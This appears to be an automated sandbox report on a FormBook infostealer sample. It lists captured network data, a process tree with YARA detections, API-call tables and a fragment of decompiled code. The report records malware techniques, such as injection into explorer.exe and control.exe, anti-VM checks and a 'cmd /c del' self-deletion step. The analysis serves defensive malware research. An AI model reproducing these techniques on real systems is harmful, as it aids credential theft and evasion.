                                                            Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><link rel="icon" href="/favicon.ico" type="image/x-icon"/><title>_</title><meta name="keywords" content="_"> <meta name="description"content="_"><meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no"><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?8518669f0d31e41508be0babf5a8fc28"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script> <script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);
                                                            Oct 13, 2021 13:39:28.372539043 CEST6081INData Raw: 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 2f 7a 78 79 68 68 64 2f 74 7a 6a 73 2f 74 7a 2e 6a 73 27 3e 3c 2f 73 63 72 69
                                                            Data Ascii: })();</script><script type='text/javascript' src='/zxyhhd/tzjs/tz.js'></script></head></html>


                                                            Code Manipulations

                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Start time:13:37:28
                                                            Start date:13/10/2021
                                                            Path:C:\Users\user\Desktop\iAuPyHuUkk.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:'C:\Users\user\Desktop\iAuPyHuUkk.exe'
                                                            Imagebase:0xf00000
                                                            File size:698880 bytes
                                                            MD5 hash:6040407905EA1AA24DD58DC8BEFA4255
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.371245810.00000000043C9000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.371245810.00000000043C9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.371245810.00000000043C9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.370703013.00000000033F7000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.370638895.00000000033C1000.00000004.00000001.sdmp, Author: Joe Security
                                                            Reputation:low

                                                            General

                                                            Start time:13:37:37
                                                            Start date:13/10/2021
                                                            Path:C:\Users\user\Desktop\iAuPyHuUkk.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\Desktop\iAuPyHuUkk.exe
                                                            Imagebase:0xbc0000
                                                            File size:698880 bytes
                                                            MD5 hash:6040407905EA1AA24DD58DC8BEFA4255
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.454131267.00000000015D0000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.454131267.00000000015D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.454131267.00000000015D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:low

                                                            General

                                                            Start time:13:37:38
                                                            Start date:13/10/2021
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Explorer.EXE
                                                            Imagebase:0x7ff6f22f0000
                                                            File size:3933184 bytes
                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.400507122.00000000075B9000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.400507122.00000000075B9000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.400507122.00000000075B9000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.421546178.00000000075B9000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.421546178.00000000075B9000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.421546178.00000000075B9000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:high

                                                            General

                                                            Start time:13:38:07
                                                            Start date:13/10/2021
                                                            Path:C:\Windows\SysWOW64\autofmt.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\SysWOW64\autofmt.exe
                                                            Imagebase:0x12e0000
                                                            File size:831488 bytes
                                                            MD5 hash:7FC345F685C2A58283872D851316ACC4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            General

                                                            Start time:13:38:14
                                                            Start date:13/10/2021
                                                            Path:C:\Windows\SysWOW64\control.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\control.exe
                                                            Imagebase:0xd20000
                                                            File size:114688 bytes
                                                            MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.619272890.0000000003010000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.619272890.0000000003010000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.619272890.0000000003010000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:moderate

                                                            General

                                                            Start time:13:38:18
                                                            Start date:13/10/2021
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:/c del 'C:\Users\user\Desktop\iAuPyHuUkk.exe'
                                                            Imagebase:0x2a0000
                                                            File size:232960 bytes
                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:13:38:19
                                                            Start date:13/10/2021
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff61de10000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Disassembly

                                                            Code Analysis

                                                            Reset < >

                                                              Executed Functions

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.370234477.0000000001A40000.00000040.00000001.sdmp, Offset: 01A40000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b4b6c09531c717a978960b3ef86bd48125898794e91b32a80a61fd9ddfb4a887
                                                              • Instruction ID: d4027dbc20eeb8c7849e718b9b63efe5d5e1b72d067f58723fe6c0b77d03a0f9
                                                              • Opcode Fuzzy Hash: b4b6c09531c717a978960b3ef86bd48125898794e91b32a80a61fd9ddfb4a887
                                                              • Instruction Fuzzy Hash: D8D148B9C117468BD730CF65E88818D7BB1FBA53A8F604309D2616BAE8D7B5144BCF84
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 01A4C630
                                                              • GetCurrentThread.KERNEL32 ref: 01A4C66D
                                                              • GetCurrentProcess.KERNEL32 ref: 01A4C6AA
                                                              • GetCurrentThreadId.KERNEL32 ref: 01A4C703
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.370234477.0000000001A40000.00000040.00000001.sdmp, Offset: 01A40000, based on PE: false
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: 975f21c4412daa8625a5fa8f41302a60724c392bd5b17a8ef0ddb7cf682d37a1
                                                              • Instruction ID: b99807399600b0f86e37cdeb65debf61289c4b51f66397b319d1b30264730b6c
                                                              • Opcode Fuzzy Hash: 975f21c4412daa8625a5fa8f41302a60724c392bd5b17a8ef0ddb7cf682d37a1
                                                              • Instruction Fuzzy Hash: DB5145B0A013499FDB14CFAAC548BDEBFF4BF88314F248469E419A7390DB746844CB69
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 01A4C630
                                                              • GetCurrentThread.KERNEL32 ref: 01A4C66D
                                                              • GetCurrentProcess.KERNEL32 ref: 01A4C6AA
                                                              • GetCurrentThreadId.KERNEL32 ref: 01A4C703
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.370234477.0000000001A40000.00000040.00000001.sdmp, Offset: 01A40000, based on PE: false
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: 964497f658937e86afb8b5c1bf7022c9caf95e54b90bd0daa0487b80be96a5da
                                                              • Instruction ID: 9109fac67245a97c2eff80d2f4068f0d0f6066e2c0813e14aa1e87de86ff6754
                                                              • Opcode Fuzzy Hash: 964497f658937e86afb8b5c1bf7022c9caf95e54b90bd0daa0487b80be96a5da
                                                              • Instruction Fuzzy Hash: F15144B0A013498FDB14CFAAC548BDEBFF4BB88314F24845AE419A7360DB746844CF69
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 01A4A516
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.370234477.0000000001A40000.00000040.00000001.sdmp, Offset: 01A40000, based on PE: false
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 8c9c8bc62ae8d24a1efdefe3cd9bf39b2cf0313c0e43575292cde710610652ae
                                                              • Instruction ID: c83445db32173ccd384bb4268f2a1350ba72e4b73ee1f4413bf92324caab1112
                                                              • Opcode Fuzzy Hash: 8c9c8bc62ae8d24a1efdefe3cd9bf39b2cf0313c0e43575292cde710610652ae
                                                              • Instruction Fuzzy Hash: 7A712370A00B058FD724CF6AC14479BBBF5FF88204F00892ED58ADBA50EB74E8498B91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01A4C87F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.370234477.0000000001A40000.00000040.00000001.sdmp, Offset: 01A40000, based on PE: false
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 45a73afc5b0f076ac782fb70c166f361e418f41256f51cad4fcde29161f1a3b2
                                                              • Instruction ID: bede883429c8c7ac14d3d7d8bef575840fef1247f0da4cace573b4402707532d
                                                              • Opcode Fuzzy Hash: 45a73afc5b0f076ac782fb70c166f361e418f41256f51cad4fcde29161f1a3b2
                                                              • Instruction Fuzzy Hash: 9421E6B5D012099FDB10CF99D884ADEBFF8FB48324F14841AE958A7350D778A954CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01A4A591,00000800,00000000,00000000), ref: 01A4A7A2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.370234477.0000000001A40000.00000040.00000001.sdmp, Offset: 01A40000, based on PE: false
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: b1b9b1c4f3a6969ba3bcbad1eba8a8986b69fd06408e5e776479f907004cdc9d
                                                              • Instruction ID: 38a26393634fa312cd5b5f882a1e3f3216691eaeadc464ec2e10df994c337fb0
                                                              • Opcode Fuzzy Hash: b1b9b1c4f3a6969ba3bcbad1eba8a8986b69fd06408e5e776479f907004cdc9d
                                                              • Instruction Fuzzy Hash: 2D216AB69043498FCB10CF9AC484ADEFBF4AB98324F04842ED556A7201C378A545CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01A4C87F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.370234477.0000000001A40000.00000040.00000001.sdmp, Offset: 01A40000, based on PE: false
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: c7cbf099a1aeb64d32b0e382ca3c220f5e8d3dee45a53b332174bd8f4db63032
                                                              • Instruction ID: 4ec6e67c1601e4f2afecd0a108d594c4b16af85de6127544556b56febf1ffb64
                                                              • Opcode Fuzzy Hash: c7cbf099a1aeb64d32b0e382ca3c220f5e8d3dee45a53b332174bd8f4db63032
                                                              • Instruction Fuzzy Hash: 2721D8B5D012089FDB10CF99D584ADEBFF8FB48324F14841AE954A7310D774A954CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01A4A591,00000800,00000000,00000000), ref: 01A4A7A2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.370234477.0000000001A40000.00000040.00000001.sdmp, Offset: 01A40000, based on PE: false
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: 66d14d6a15e1443ae2bd9d32f5a45e4dd8f5051fe1bbb1c39a07cfc3754df8f0
                                                              • Instruction ID: b858cea179500c85d935c9b2db4269c3a47d139307f5f7444f901dd2536389f7
                                                              • Opcode Fuzzy Hash: 66d14d6a15e1443ae2bd9d32f5a45e4dd8f5051fe1bbb1c39a07cfc3754df8f0
                                                              • Instruction Fuzzy Hash: 7211F6B69402099FDB10CF9AC484BDEFBF4FB98324F14842ED956A7600C779A545CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01A4A591,00000800,00000000,00000000), ref: 01A4A7A2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.370234477.0000000001A40000.00000040.00000001.sdmp, Offset: 01A40000, based on PE: false
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: 32e8a73a8f70571818bf26c7722e62b885370f1bbb55b79a7e0390e3e44c9a2e
                                                              • Instruction ID: 422527bbf99baa00d4db01e662c19225f03c4feb9dd420e21a1bc60454ee3aeb
                                                              • Opcode Fuzzy Hash: 32e8a73a8f70571818bf26c7722e62b885370f1bbb55b79a7e0390e3e44c9a2e
                                                              • Instruction Fuzzy Hash: 271117B69002089FDB10CF9AC484ADEFBF4EB98324F14842ED916A7200C379A545CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 01A4A516
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.370234477.0000000001A40000.00000040.00000001.sdmp, Offset: 01A40000, based on PE: false
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: cad23e79677fe9ab9579e873edc7b5a4c41ab125a940c2d3e93cc968f4fb5b58
                                                              • Instruction ID: 267f7e4a068497b4198653720e83c873b599fd4f8c80dc3285c492cf98c985bb
                                                              • Opcode Fuzzy Hash: cad23e79677fe9ab9579e873edc7b5a4c41ab125a940c2d3e93cc968f4fb5b58
                                                              • Instruction Fuzzy Hash: B011E3B6D006498FDB10CF9AC544BDEFBF4EB88324F14841AD55AB7600C375A545CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • PostMessageW.USER32(?,?,?,?), ref: 064D1B05
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374063307.00000000064D0000.00000040.00000001.sdmp, Offset: 064D0000, based on PE: false
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: c9d355a127e06ab96be8289704515b685b06c35c7c19f42c82047f911fb70635
                                                              • Instruction ID: 60eb3e0afc027029bed200c5103f34792241ae6449b15ac2dc9ea87c9a70846f
                                                              • Opcode Fuzzy Hash: c9d355a127e06ab96be8289704515b685b06c35c7c19f42c82047f911fb70635
                                                              • Instruction Fuzzy Hash: 491100B59002489FCB10CF9AC885BDEBBF8EB48324F14841AE954A7340C374A984CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • PostMessageW.USER32(?,?,?,?), ref: 064D1B05
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374063307.00000000064D0000.00000040.00000001.sdmp, Offset: 064D0000, based on PE: false
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: a68bce4c64e8551c8b4c2327d4c0394263e0a4e644d3ffe6555acd62376f79c4
                                                              • Instruction ID: 88307976f7149b229c9b2f269e483872eacd633db3e2cd6374faa9319e85d007
                                                              • Opcode Fuzzy Hash: a68bce4c64e8551c8b4c2327d4c0394263e0a4e644d3ffe6555acd62376f79c4
                                                              • Instruction Fuzzy Hash: 061100B59002489FCB10CF9AC884BDEBBF8EB48324F14841AE954A7300C374A984CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.370234477.0000000001A40000.00000040.00000001.sdmp, Offset: 01A40000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bd58179c33f42fe4bbc4645f32e2ed3e8abf092660e666b691eddf02e354ece6
                                                              • Instruction ID: f7295ecaddbf13556e3959b032ddc4ad8f516bf267928339dfaa1b0e2ddbdc7c
                                                              • Opcode Fuzzy Hash: bd58179c33f42fe4bbc4645f32e2ed3e8abf092660e666b691eddf02e354ece6
                                                              • Instruction Fuzzy Hash: 5712A2F9C117468AD330CF65E89C18D3BA1B7653A8F904308D2A16BAF9D7B9114BCF84
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.370234477.0000000001A40000.00000040.00000001.sdmp, Offset: 01A40000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aa03d44088cebc413af69984aaa2eb93ce7508ccb97b117e1d0bf67e9e4b5581
                                                              • Instruction ID: 9232d2e92a4b9f6552c15731720e2e532304d901140ba79ad0d1f44680f80ab2
                                                              • Opcode Fuzzy Hash: aa03d44088cebc413af69984aaa2eb93ce7508ccb97b117e1d0bf67e9e4b5581
                                                              • Instruction Fuzzy Hash: 25A16E36E0021ACFCF15DFB9C9445DEBBB2FFC9300B15856AE905AB261EB35A945CB40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374063307.00000000064D0000.00000040.00000001.sdmp, Offset: 064D0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0dccf8bb5865af04271cca22d48a98f45714c4ac24b02484b084e60d1930b0db
                                                              • Instruction ID: c9ff7386ba5de6b4b641908a94ef5d3f614cb409353f7169bcbeae872889f129
                                                              • Opcode Fuzzy Hash: 0dccf8bb5865af04271cca22d48a98f45714c4ac24b02484b084e60d1930b0db
                                                              • Instruction Fuzzy Hash: 98610274D01228CFEB65DF25C8587E9BBF2AB4A305F0480EAD949A7280D7749AC4CF81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374063307.00000000064D0000.00000040.00000001.sdmp, Offset: 064D0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7b4c4d84de85b83d2d4109f0673e42078285f51b8417777be01d242dfb1b5bb4
                                                              • Instruction ID: f53e822aae4a433ad07937e5f29c3d28b861144d88f46326fac9ae067f101ef8
                                                              • Opcode Fuzzy Hash: 7b4c4d84de85b83d2d4109f0673e42078285f51b8417777be01d242dfb1b5bb4
                                                              • Instruction Fuzzy Hash: C4413775E01228CFEB64DF65D9587E9BBF2AB8A301F0480EAD94DA7241D7308AC5CF41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374063307.00000000064D0000.00000040.00000001.sdmp, Offset: 064D0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b133b5cd148a7ade2badb8cf0b67ced28fa327163d0f63b87a225d48e5f5c412
                                                              • Instruction ID: bfc5a1e778a9a679b8b586a9bd4d22aae2e8241da1fee3cf9af95e85770f2b28
                                                              • Opcode Fuzzy Hash: b133b5cd148a7ade2badb8cf0b67ced28fa327163d0f63b87a225d48e5f5c412
                                                              • Instruction Fuzzy Hash: FE41CF74E02229CFDBA0EF64D9987EDBBB1EB0A305F0044EAD909A7250D7759AC4CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374063307.00000000064D0000.00000040.00000001.sdmp, Offset: 064D0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0989cf45b539697970012e9922663a6e0effa5ab7714d9e9d507b4f10aa541ee
                                                              • Instruction ID: bf57f46d72a41673b217032f27f952589c0a53c64d2fedd2700adacca3032fa9
                                                              • Opcode Fuzzy Hash: 0989cf45b539697970012e9922663a6e0effa5ab7714d9e9d507b4f10aa541ee
                                                              • Instruction Fuzzy Hash: 9A310275E01229CFEB61DF64D9547E9BBB1BF4A305F0086E6D909A7640E7709AC0CF81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374063307.00000000064D0000.00000040.00000001.sdmp, Offset: 064D0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3a0d0a0b334bc4c1e318a746d7645b62eefbc665699fff86c9315b550cacd005
                                                              • Instruction ID: 478e4f982827b48cee2b2322042ad62e58d04e0636b7e97196519d2b4977d748
                                                              • Opcode Fuzzy Hash: 3a0d0a0b334bc4c1e318a746d7645b62eefbc665699fff86c9315b550cacd005
                                                              • Instruction Fuzzy Hash: 9A310174E01229CFEBA4DF64D9647E9BBF1AB4A305F0084EAD90DA3640D7749AC5CF41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374063307.00000000064D0000.00000040.00000001.sdmp, Offset: 064D0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0242d8258041a5b373622989b3882fefc98deb0bf9467c2907e1aa05f21c1dff
                                                              • Instruction ID: 27ee25178d2efdf700c03f2e8bae020b931429560f53921876d0795ceb32d9e3
                                                              • Opcode Fuzzy Hash: 0242d8258041a5b373622989b3882fefc98deb0bf9467c2907e1aa05f21c1dff
                                                              • Instruction Fuzzy Hash: 50311F74E01229CFEB60DF64D9687E9BBB1AB4A305F0085EAD909A7240D7709AC0CF41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374063307.00000000064D0000.00000040.00000001.sdmp, Offset: 064D0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b9e63dfce822ed269c17c994fd1840d599bb5a081cac6d03e231348caf8ab5c6
                                                              • Instruction ID: ffb266f67b3b948ad1c443c93b16971dee51d90cb9c67771e109fa2edffc2601
                                                              • Opcode Fuzzy Hash: b9e63dfce822ed269c17c994fd1840d599bb5a081cac6d03e231348caf8ab5c6
                                                              • Instruction Fuzzy Hash: 8A310074E01228CFEBA0DF64D9687E9BBF1AB4A305F0084EAD949A3240D7749AC4CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374063307.00000000064D0000.00000040.00000001.sdmp, Offset: 064D0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5cd0d5034f89343e45ee0a09fe445ccc9f6ff5a4338f56f2dbef36bc6ccb7c8d
                                                              • Instruction ID: 0ecc8f925b6e86ff96430f642c43d0aab3370da1e1db8f9c9a998fbf449e4aca
                                                              • Opcode Fuzzy Hash: 5cd0d5034f89343e45ee0a09fe445ccc9f6ff5a4338f56f2dbef36bc6ccb7c8d
                                                              • Instruction Fuzzy Hash: C6310074E01228CFDBA1EF64D9987E9BBB1AB0A315F0480E6D94DA7241D7749AC0CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Executed Functions

                                                              C-Code - Quality: 21%
                                                              			E0041869A(signed int __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
                                                              				void* _t20;
                                                              				void* _t31;
                                                              				intOrPtr* _t32;
                                                              				void* _t34;
                                                              
                                                              				asm("out dx, al");
                                                              				 *(__edi + 0x559a57ef) =  *(__edi + 0x559a57ef) >> __ecx;
                                                              				_t15 = _a4;
                                                              				_t32 = _a4 + 0xc48;
                                                              				E004191F0(__edi, _a4, _t32,  *((intOrPtr*)(_t15 + 0x10)), 0, 0x2a);
